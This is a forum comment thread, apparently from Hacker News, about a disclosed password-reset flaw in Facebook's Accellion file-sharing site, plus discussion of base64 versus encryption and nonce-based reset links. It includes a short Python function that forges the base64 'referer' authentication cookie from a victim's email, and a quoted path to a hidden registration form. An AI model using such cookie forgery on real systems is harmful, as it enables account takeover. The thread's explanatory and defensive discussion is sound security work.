"This Version of ionCube was not vulnerable to a possible decryption"
Does he just mean "this version doesn't have a readily available disassembler yet"? Even if they chose the path of compiling to native code, if you own the box, it can't be that hard to get the code.
I wish he'd gone down this route further. It looks like there's code at the top of the file that "decrypts" (decodes?) the contents of the PHP file. I'd be curious why he felt this wasn't worth reversing.
I'm also curious if there's a way to dump 'disassembled' PHP after it's been loaded into the PHP processor. If it's going through eval() at the end, then shouldn't the plain-text source be available in a string somewhere?
I believe these obfuscators work by forcing you to install a binary-only .so zend extension in php.ini, which intercepts these encoded files. The files themselves should decode to already-halfway-parsed PHP opcodes or so, which is probably injected into the PHP/Zend virtual machine.
Figuring out the encoding scheme is probably a lot of boring disassembly work, which in the end just lets you decode a bunch of PHP opcodes which themselves would take a lot of work to make sense of.
They are using it to make sure the value doesn't interfere with the syntax of HTTP headers, i.e. for escaping, not for encryption. That's exactly what base64 is for. They simply have no encryption at all.
Can email interfere with HTTP headers though? There's no \r\n, ";" or "=" in valid email.
Anyway, I have seen sites where it was used as a security measure. Or so the authors thought, I guess. Storing a login password in a URL parameter? Seems safe if it's encoded... But that was years ago.
It sounds like you confused encoding with encryption; encoded data is no different from plain text. The encoding is just to get a valid string for the URI (so a password can contain special URI characters) and is instantly reversible.
Did not know that, thanks for pointing that out. In that case the encoding is necessary. On top of that I just found out that even Unicode characters are permitted (RFC 6531).
Exactly. Initially, I was confused by this statement too.
There's nothing wrong with base64 encoding; one just needs to apply it in the correct context: encoding hashes, avoiding text collisions/escaping characters, or simply embedding plain old non-sensitive binary data in text.
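To make the encoded-vs-encrypted point concrete, here's a quick sketch in Python: base64 round-trips with no key, so it hides nothing.

```python
import base64

# base64 is an encoding, not encryption: anyone can reverse it with no key.
password = "hunter2"
encoded = base64.b64encode(password.encode()).decode()
print(encoded)  # aHVudGVyMg==

decoded = base64.b64decode(encoded).decode()
assert decoded == password  # round-trips perfectly; nothing is hidden
```

That's all an "encoded" credential is: the same bytes in a transport-safe alphabet.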
I don't think you've worked with many 'enterprise'-level software products. "Enterprise" basically means having a sales force willing to slog through an RFP.
I understand that Facebook has more important things to do than create their own file-sharing service (for internal purposes), but I can't stop asking: why not build their own thing?
Well you pretty much answered your own question, didn't you?
Surely it is cheaper to buy an off-the-shelf solution than to waste money and engineering time building and supporting a product that is not core to their mission.
I'm confused. This looks like an interesting hack, but I don't understand what's going on here, despite reading the post 4 times and watching the video twice.
What is this "Password Recovery" page? Is this for emailing a person a reset link to a password? Is it for changing your password? What is the cookie used for? What is the flawed logic in the system?
I think the process was that a user was sent a 'forgot password' link. When they clicked the link, they were redirected to `wmPassupdate.html` with the cookie `referer={base64(email)}` set. Then, when users submit the password update form, the `referer` cookie is used to authenticate them, but it can be trivially generated.
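If that reconstruction of the flow is right, forging the cookie requires nothing but the victim's email address. A hypothetical sketch (the cookie name `referer` comes from the write-up; the function and email are illustrative):

```python
import base64

def forge_referer_cookie(victim_email: str) -> str:
    """Build the cookie value that supposedly authenticates the
    password-update form -- no secret material required."""
    encoded = base64.b64encode(victim_email.encode()).decode()
    return f"referer={encoded}"

# An attacker only needs to know the target's email address.
print(forge_referer_cookie("victim@example.com"))
```

The fatal flaw is that the "authentication" token is derived entirely from public information, so anyone can mint a valid one.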
tptacek will shortly be along to explain how password reset links are typically implemented, and how they're one of the most common places to make mistakes.
How you should just "take the hit" (the cost is trivial) and store a randomly generated nonce in your database, rather than do shenanigans like encoding user information in the URL with secrets and bad cryptography and whatnot.
Do you have any examples of someone further explaining what you are suggesting? Or if you have time, can you elaborate on this point? I glanced at the nonce article on Wikipedia, and if I understand correctly you are suggesting:
1) user creates account (which generates a nonce)
2) when resetting the password via email, authenticate via the nonce
3) when the password is reset, regenerate the nonce
Is that right? Just trying to better understand what appears to be a good approach to password resets.
That's basically right. Generally you generate the nonce when someone clicks the 'forgot password' link, but I suppose you could do it when someone creates the account as well.
I'm confused. How exactly is the nonce to be used without a link?
I was under the impression that best practice was a link with a randomly generated key that has an expiration date (and is expired as soon as it is used). The only security hole here is if the email is intercepted (and you've got other problems at that point).
I realize that key == nonce in my post. My point was against the statement "emailing password reset links is bad and not best practice." You need a password reset link to make use of the key/nonce. The point of the nonce isn't to eliminate links. It's to make the attack surface that much smaller by limiting their power.
It sounds like the link in the "Password reset" email doesn't use a secret one-time expiring token, but instead base64-encodes the user's email address, so it can trivially be generated by an attacker.
Not just that, but there was a self-help page for self-registering your own account (the first screenshot):
> It seems that Facebook was trying to avoid the creation of accounts in Accellion after removing the register form from the pageview
> I discovered that if you know the direct location of the form (/courier/web/1000@/wmReg.html), You can easily bypass that protection and create an account in files.fb.com,
Once he created his own accounts, he could test out his exploit code on his created accounts.
The last screenshot is a capture of Windows Media Player playing back a desktop video capture session; basically screenshot inception. The author provides no information on timelines, so it's likely that he found this exploit back in March of 2012, but is just releasing the write-up now.
1) Identified a badly protected side entrance to use rather than the front door
2) Painstakingly researched the third party product (similarly one could investigate a third party library used in a bespoke codebase)
3) Figured out the adaptations the target organisation had made to it and guessed some mistakes they'd made
4) Eventually hit on a cookie modification attack made possible by limitations found in that publicly-available codebase.
Smart.